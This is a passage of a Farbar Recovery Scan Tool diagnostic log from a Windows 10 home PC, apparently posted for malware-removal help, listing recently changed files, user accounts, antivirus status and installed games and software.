2022-07-13 18:34 - 2022-07-13 18:34 - 000026624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mode.com
2022-07-13 18:34 - 2022-07-13 18:34 - 000018944 _____ C:\WINDOWS\SysWOW64\WsdProviderUtil.dll
2022-07-13 18:34 - 2022-07-13 18:34 - 000017920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tree.com
2022-07-13 18:34 - 2022-07-13 18:34 - 000012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\chcp.com
2022-07-13 18:33 - 2022-07-13 18:33 - 002260480 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000640512 _____ C:\WINDOWS\system32\SettingSyncDownloadHelper.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000530944 _____ (curl, hxxps://curl.se/) C:\WINDOWS\system32\curl.exe
2022-07-13 18:33 - 2022-07-13 18:33 - 000288768 _____ C:\WINDOWS\system32\Windows.Management.InprocObjects.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000270848 _____ C:\WINDOWS\system32\EsclScan.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000152064 _____ C:\WINDOWS\system32\EsclProtocol.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000061952 _____ C:\WINDOWS\system32\printticketvalidation.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000057344 _____ C:\WINDOWS\system32\APMonUI.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\mode.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000024576 _____ C:\WINDOWS\system32\WsdProviderUtil.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\tree.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\chcp.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000011811 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2022-07-13 18:26 - 2022-07-13 18:26 - 000000000 ___HD C:\$WinREAgent
2022-07-12 17:37 - 2022-07-12 17:37 - 000000000 ____D C:\Users\Miggy\AppData\Local\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000001032 _____ C:\Users\Public\Desktop\ONN..lnk
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\Program Files (x86)\ONN
2022-07-12 17:36 - 2019-10-10 08:59 - 000024784 _____ (0) C:\WINDOWS\system32\Drivers\HHTHid.sys
2022-07-12 17:36 - 2019-10-10 08:59 - 000023896 _____ (0) C:\WINDOWS\system32\Drivers\HHTHidMouFiltr.sys
2022-07-12 17:35 - 2022-07-12 17:36 - 091204040 _____ () C:\Users\Miggy\Downloads\Onn Setup20211115V1.0.0.5.05 (1).exe
2022-07-12 17:35 - 2022-07-12 17:35 - 091204040 _____ () C:\Users\Miggy\Downloads\Onn Setup20211115V1.0.0.5.05.exe
2022-07-11 22:18 - 2022-07-11 22:18 - 000000223 _____ C:\Users\Miggy\Desktop\Fears to Fathom - Episode 2.url
2022-07-11 16:14 - 2022-07-11 16:14 - 000000000 ____D C:\Program Files\EA Games
2022-07-10 16:25 - 2022-07-10 16:25 - 000000000 ____D C:\Users\Miggy\Documents\New folder
2022-07-05 18:55 - 2022-07-14 16:27 - 000000000 ____D C:\Program Files (x86)\Origin Games
2022-07-05 18:55 - 2022-07-05 18:55 - 000000000 ____D C:\Users\Miggy\AppData\Local\Haze1
2022-07-05 18:54 - 2022-07-05 18:54 - 000001066 _____ C:\Users\Public\Desktop\Origin.lnk
2022-07-05 18:54 - 2022-07-05 18:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2022-07-05 18:54 - 2022-07-05 18:54 - 000000000 ____D C:\Program Files (x86)\Origin
2022-07-05 18:53 - 2022-07-14 20:33 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Origin
2022-07-03 14:39 - 2022-07-17 19:45 - 000000000 ____D C:\Users\Miggy\Documents\WB Games
2022-07-03 14:39 - 2022-07-03 14:39 - 000000000 ____D C:\Users\Miggy\AppData\Local\Downloaded Installations
 
==================== One month (modified) ==================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2022-07-30 13:23 - 2020-07-31 20:07 - 000000000 ____D C:\Users\Miggy\AppData\Local\CrashDumps
2022-07-30 13:22 - 2021-03-15 13:25 - 000840598 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2022-07-30 13:22 - 2019-12-07 02:13 - 000000000 ____D C:\WINDOWS\INF
2022-07-30 13:19 - 2020-11-24 16:45 - 000000000 ____D C:\Program Files (x86)\Steam
2022-07-30 13:19 - 2020-08-04 16:40 - 000000000 ___RD C:\Users\Miggy\Creative Cloud Files
2022-07-30 13:19 - 2020-07-31 19:24 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\discord
2022-07-30 13:19 - 2020-07-31 19:11 - 000000000 ____D C:\Users\Miggy\AppData\Local\Spotify
2022-07-30 13:18 - 2021-11-03 16:17 - 000000000 ____D C:\Users\Miggy\AppData\Local\Origin
2022-07-30 13:18 - 2020-08-02 14:57 - 000000000 ____D C:\ProgramData\Origin
2022-07-30 13:18 - 2020-07-31 20:28 - 000000001 _____ C:\WINDOWS\vgkbootstatus.dat
2022-07-30 13:18 - 2020-07-31 19:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\Discord
2022-07-30 13:18 - 2020-07-31 19:08 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Spotify
2022-07-30 13:18 - 2020-07-31 18:23 - 000000000 ____D C:\Program Files (x86)\Google
2022-07-30 13:18 - 2020-07-31 18:18 - 000000000 ___RD C:\Users\Miggy\OneDrive
2022-07-30 13:18 - 2020-02-05 16:06 - 000000000 ____D C:\ProgramData\NVIDIA
2022-07-30 13:15 - 2021-03-15 13:21 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2022-07-30 13:15 - 2021-03-15 13:17 - 000008192 ___SH C:\DumpStack.log.tmp
2022-07-30 13:15 - 2020-07-31 18:36 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2022-07-30 13:15 - 2019-12-07 02:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-07-30 13:14 - 2021-11-13 19:25 - 000004152 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{1A3EA42E-993D-412D-B564-43DC52E6644C}
2022-07-30 13:14 - 2019-12-07 02:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-07-30 13:14 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-07-30 13:14 - 2019-12-07 02:03 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2022-07-30 13:13 - 2020-08-13 00:26 - 000002438 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-07-30 13:13 - 2020-08-13 00:26 - 000002276 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2022-07-29 19:38 - 2021-07-09 21:35 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Mozilla
2022-07-29 19:16 - 2021-11-22 21:01 - 000144856 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamelaunchhelper.dll
2022-07-29 19:16 - 2020-09-14 10:45 - 002754000 _____ (Microsoft Corporation) C:\WINDOWS\system32\xgameruntime.dll
2022-07-29 19:16 - 2020-09-14 10:45 - 000402904 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameplatformservices.dll
2022-07-29 19:16 - 2020-09-14 10:45 - 000234960 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingservicesproxy.dll
2022-07-29 19:16 - 2020-09-14 10:45 - 000198096 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameconfighelper.dll
2022-07-29 19:16 - 2020-09-14 10:45 - 000131072 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingtcuihelpers.dll
2022-07-29 19:16 - 2020-09-14 10:45 - 000067032 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamemodcontrol.exe
2022-07-28 23:40 - 2021-03-15 13:17 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-07-28 22:43 - 2021-07-09 21:35 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2022-07-28 22:42 - 2021-03-15 13:18 - 000000000 ____D C:\Users\Miggy
2022-07-28 20:18 - 2020-08-01 09:48 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2022-07-28 19:52 - 2020-08-04 16:37 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2022-07-28 19:11 - 2022-01-10 16:18 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\slobs-client
2022-07-28 18:03 - 2021-12-29 17:50 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\EasyAntiCheat
2022-07-28 15:50 - 2022-05-17 17:09 - 000002493 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk
2022-07-28 15:50 - 2022-01-12 18:36 - 000000000 ____D C:\Program Files\Common Files\PUBG
2022-07-28 15:50 - 2022-01-10 16:17 - 000001976 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk
2022-07-28 15:50 - 2020-07-31 19:48 - 000000000 ____D C:\ProgramData\Riot Games
2022-07-28 15:50 - 2020-07-31 18:24 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2022-07-28 15:50 - 2020-02-05 16:07 - 000022478 _____ C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1
2022-07-27 20:36 - 2022-05-12 17:24 - 000001386 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
2022-07-27 20:36 - 2020-08-01 19:19 - 000001270 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk
2022-07-27 20:36 - 2020-02-11 17:44 - 000001209 _____ C:\ProgramData\NvcDispCorePlugin.log_backup1
2022-07-27 20:36 - 2020-02-05 16:07 - 000017940 _____ C:\ProgramData\NVDisplayContainerWatchdog.log_backup1
2022-07-27 18:26 - 2021-10-15 21:59 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2022-07-27 18:26 - 2021-07-09 21:35 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2022-07-26 16:24 - 2019-12-07 02:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2022-07-26 16:14 - 2022-06-22 22:58 - 000001130 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk
2022-07-26 16:14 - 2022-01-25 18:36 - 000005016 _____ C:\ProgramData\rsEngine.config.backup
2022-07-26 14:38 - 2021-03-19 22:09 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Vortex
2022-07-26 13:31 - 2021-12-28 23:14 - 000000000 ____D C:\Users\Miggy\AppData\Local\Fallout4
2022-07-24 23:38 - 2021-01-02 18:45 - 000000000 ____D C:\Users\Miggy\AppData\Local\Battle.net
2022-07-24 22:38 - 2022-05-28 20:04 - 000000000 ____D C:\Program Files (x86)\Overwatch
2022-07-24 22:38 - 2021-01-02 18:45 - 000000000 ____D C:\Program Files (x86)\Battle.net
2022-07-23 18:51 - 2022-01-28 21:16 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\qBittorrent
2022-07-23 18:23 - 2022-06-05 14:55 - 000000000 ____D C:\Users\Miggy\AppData\Local\MEGAsync
2022-07-21 23:48 - 2020-08-23 13:56 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\MMFApplications
2022-07-21 23:07 - 2020-08-01 12:57 - 000001425 _____ C:\Users\Miggy\Desktop\Roblox Player.lnk
2022-07-21 23:07 - 2020-08-01 12:52 - 000001248 _____ C:\Users\Miggy\Desktop\Roblox Studio.lnk
2022-07-21 23:07 - 2020-08-01 12:52 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox
2022-07-21 20:02 - 2022-01-10 16:17 - 000000000 ____D C:\Program Files\Streamlabs OBS
2022-07-20 12:12 - 2020-11-06 18:11 - 000000000 ___HD C:\adobeTemp
2022-07-20 12:11 - 2020-07-31 18:24 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2022-07-20 12:08 - 2021-03-15 13:21 - 000003536 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2022-07-20 12:06 - 2020-08-04 16:36 - 000000000 ____D C:\Program Files\Common Files\Adobe
2022-07-19 16:43 - 2020-07-31 20:17 - 000000000 ____D C:\Program Files\Riot Vanguard
2022-07-18 20:58 - 2021-12-10 22:51 - 000003592 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-2826498334-1472090739-1589450912-1002
2022-07-18 20:58 - 2021-03-15 13:21 - 000003364 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2826498334-1472090739-1589450912-1002
2022-07-18 20:58 - 2021-03-15 13:18 - 000002383 _____ C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2022-07-17 17:51 - 2021-01-12 22:42 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Temp
2022-07-16 21:09 - 2022-02-09 20:48 - 000000000 ____D C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38
2022-07-14 14:33 - 2022-06-05 15:02 - 000000000 ____D C:\Users\Miggy\Documents\MEGAsync Downloads
2022-07-13 23:07 - 2021-03-15 13:17 - 000257904 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SystemResources
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\setup
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\es-MX
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\DDFs
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2022-07-13 18:36 - 2019-12-07 02:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2022-07-13 18:33 - 2021-03-15 13:19 - 003010560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2022-07-13 18:26 - 2020-08-01 15:02 - 000000000 ____D C:\WINDOWS\system32\MRT
2022-07-13 18:23 - 2020-08-01 15:02 - 146546848 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2022-07-13 18:22 - 2020-01-24 10:48 - 000000000 ____D C:\Program Files (x86)\AMD
2022-07-12 13:10 - 2020-10-08 10:01 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\SurvivioSteam
2022-07-11 22:21 - 2022-01-22 00:32 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Rayll
2022-07-11 00:47 - 2022-04-09 15:31 - 000000000 ____D C:\Users\Miggy\AppData\Local\FalloutNV
2022-07-10 19:31 - 2021-05-01 00:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\BattlEye
2022-07-10 16:26 - 2022-06-19 19:14 - 000000000 ____D C:\Users\Miggy\Documents\Electronic Arts
2022-07-10 16:17 - 2020-08-04 16:36 - 000000000 ____D C:\Program Files\Adobe
2022-07-10 16:04 - 2020-10-10 20:06 - 000000000 ____D C:\Users\Miggy\Documents\My Games
2022-07-10 15:38 - 2021-07-16 15:06 - 000000000 ____D C:\Users\Miggy\AppData\Local\Ubisoft Game Launcher
2022-07-07 15:34 - 2020-07-31 20:34 - 000000000 ____D C:\Users\Miggy\AppData\Local\D3DSCache
2022-07-05 15:18 - 2022-03-12 10:58 - 000000000 ____D C:\Users\Miggy\Desktop\RPCS3
2022-07-02 23:24 - 2020-01-24 10:41 - 000000000 __RHD C:\Users\Public\AccountPictures
 
==================== Files in the root of some directories ========
 
2021-05-18 08:49 - 2021-10-15 16:59 - 000000032 _____ () C:\Users\Miggy\AppData\Roaming\.machineId
2021-01-20 10:18 - 2021-01-20 10:18 - 000000116 _____ () C:\Users\Miggy\AppData\Roaming\debug.log
2022-03-08 21:51 - 2022-03-08 22:04 - 000000055 _____ () C:\Users\Miggy\AppData\Roaming\grizzly.ini
2020-11-28 13:16 - 2020-11-28 13:16 - 000000098 _____ () C:\Users\Miggy\AppData\Roaming\LauncherSettings_live.cfg
2020-11-28 12:39 - 2020-11-28 12:39 - 000002577 _____ () C:\Users\Miggy\AppData\Roaming\TheHunterSettings_live.bin
2020-11-28 13:06 - 2020-11-28 13:06 - 000000048 _____ () C:\Users\Miggy\AppData\Roaming\TheHunterSettings_steam_live.cfg
2020-08-04 16:43 - 2020-08-04 16:43 - 000000000 _____ () C:\Users\Miggy\AppData\Local\oobelibMkey.log
2021-10-18 17:32 - 2021-10-18 17:32 - 000016438 _____ () C:\Users\Miggy\AppData\Local\partner.bmp
 
==================== SigCheck ============================
 
(There is no automatic fix for files that do not pass verification.)
 
==================== End of FRST.txt ========================

Here is Addition.txt:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 27-07-2022
Ran by Miggy (30-07-2022 13:26:24)
Running from C:\Users\Miggy\Downloads
Microsoft Windows 10 Home Version 21H2 19044.1826 (X64) (2021-03-15 20:22:02)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
 
(If an entry is included in the fixlist, it will be removed.)
 
Administrator (S-1-5-21-2826498334-1472090739-1589450912-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2826498334-1472090739-1589450912-503 - Limited - Disabled)
Guest (S-1-5-21-2826498334-1472090739-1589450912-501 - Limited - Disabled)
Miggy (S-1-5-21-2826498334-1472090739-1589450912-1002 - Administrator - Enabled) => C:\Users\Miggy
WDAGUtilityAccount (S-1-5-21-2826498334-1472090739-1589450912-504 - Limited - Disabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
7-Zip 21.02 alpha (x64) (HKLM\...\7-Zip) (Version: 21.02 alpha - Igor Pavlov)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 5.7.1.1 - Adobe Inc.)
Adobe Genuine Service (HKLM-x32\...\AdobeGenuineService) (Version: 7.7.0.35 - Adobe Inc.)
Adobe Illustrator 2022 (HKLM-x32\...\ILST_26_3_1) (Version: 26.3.1 - Adobe Inc.)
Adobe Photoshop 2022 (HKLM-x32\...\PHSP_23_4_2) (Version: 23.4.2.603 - Adobe Inc.)
Adobe Premiere Pro 2022 (HKLM-x32\...\PPRO_22_5) (Version: 22.5 - Adobe Inc.)
AMD Radeon Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 19.10.16 - Advanced Micro Devices, Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach)
Balanced (HKLM-x32\...\{0EA45DD4-A825-420C-AFED-C659EFE3B84F}) (Version: 4.00.0000 - Advanced Micro Devices, Inc.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Discord (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Discord) (Version: 0.0.309 - Discord Inc.)
Dolphin (HKLM-x32\...\Dolphin) (Version: 5.0 - Dolphin Team)
EA app (HKLM\...\{C2622085-ABD2-49E5-8AB9-D3D6A642C091}) (Version: 12.0.234.5222 - Electronic Arts) Hidden
EA app (HKLM-x32\...\{c5b4b74e-fcb0-4603-b92d-3d17c96a6d69}) (Version: 12.0.234.5222 - Electronic Arts)
Epic Games Launcher (HKLM-x32\...\{0EE6DDEF-E36B-45EB-9E03-5A266EC8A8F8}) (Version: 1.1.279.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Epic Online Services (HKLM-x32\...\{4B31654B-80C2-405C-91C9-49B14AEB0F42}) (Version: 2.0.32.0 - Epic Games, Inc.)
Fallout: New Vegas (HKLM-x32\...\Fallout: New Vegas_is1) (Version:  - )
FL Studio 20 (HKLM-x32\...\FL Studio 20) (Version:  - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version:  - Image-Line)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 103.0.5060.134 - Google LLC)
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
MEGAsync (HKLM-x32\...\MEGAsync) (Version:  - Mega Limited)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 103.0.1264.77 - Microsoft Corporation)
Microsoft Edge WebView2 Runtime (HKLM-x32\...\Microsoft EdgeWebView) (Version: 103.0.1264.71 - Microsoft Corporation)
Microsoft GameInput (HKLM-x32\...\{A9CFD6A1-C0D3-7F37-C220-8B104867EF15}) (Version: 10.1.22621.1011 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\OneDriveSetup.exe) (Version: 22.141.0703.0002 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{7B1FCD52-8F6B-4F12-A143-361EA39F5E7C}) (Version: 3.67.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (HKLM\...\{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (HKLM\...\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664 (HKLM-x32\...\{042d26ef-3dbe-4c25-95d3-4c1b11b235a7}) (Version: 12.0.40664.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 (HKLM-x32\...\{9dff3540-fc85-4ed5-ac84-9e3c7fd8bece}) (Version: 12.0.40664.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40664 (HKLM\...\{010792BA-551A-3AC0-A7EF-0FAB4156C382}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40664 (HKLM\...\{53CF6934-A98D-3D84-9146-FC4EDF3D5641}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40664 (HKLM-x32\...\{D401961D-3A20-3AC7-943B-6139D5BD490A}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40664 (HKLM-x32\...\{8122DAB1-ED4D-3676-BB0A-CA368196543E}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.28.29334 (HKLM-x32\...\{b2d0f752-adc5-496e-8f70-8669de01f746}) (Version: 14.28.29334.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.30.30704 (HKLM-x32\...\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}) (Version: 14.30.30704.0 - Microsoft Corporation)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.28.29334 (HKLM-x32\...\{14C49FC8-3E9B-4F29-8526-26629B5CF30B}) (Version: 14.28.29334 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.28.29334 (HKLM-x32\...\{0D01A812-82A1-481F-8546-8E28E976F8DF}) (Version: 14.28.29334 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.30.30704 (HKLM\...\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}) (Version: 14.30.30704 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.30.30704 (HKLM\...\{662A0088-6FCD-45DD-9EA7-68674058AED5}) (Version: 14.30.30704 - Microsoft Corporation) Hidden
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft Launcher (HKLM-x32\...\{27B34E47-68AE-4802-822A-9F0C187AF84A}) (Version: 1.0.0.0 - Mojang)
Mozilla Firefox (x64 en-US) (HKLM\...\Mozilla Firefox 103.0 (x64 en-US)) (Version: 103.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 89.0.2 - Mozilla)
NVIDIA FrameView SDK 1.2.7521.31103277 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.2.7521.31103277 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.25.1.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.25.1.27 - NVIDIA Corporation)
NVIDIA Graphics Driver 512.59 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 512.59 - NVIDIA Corporation)
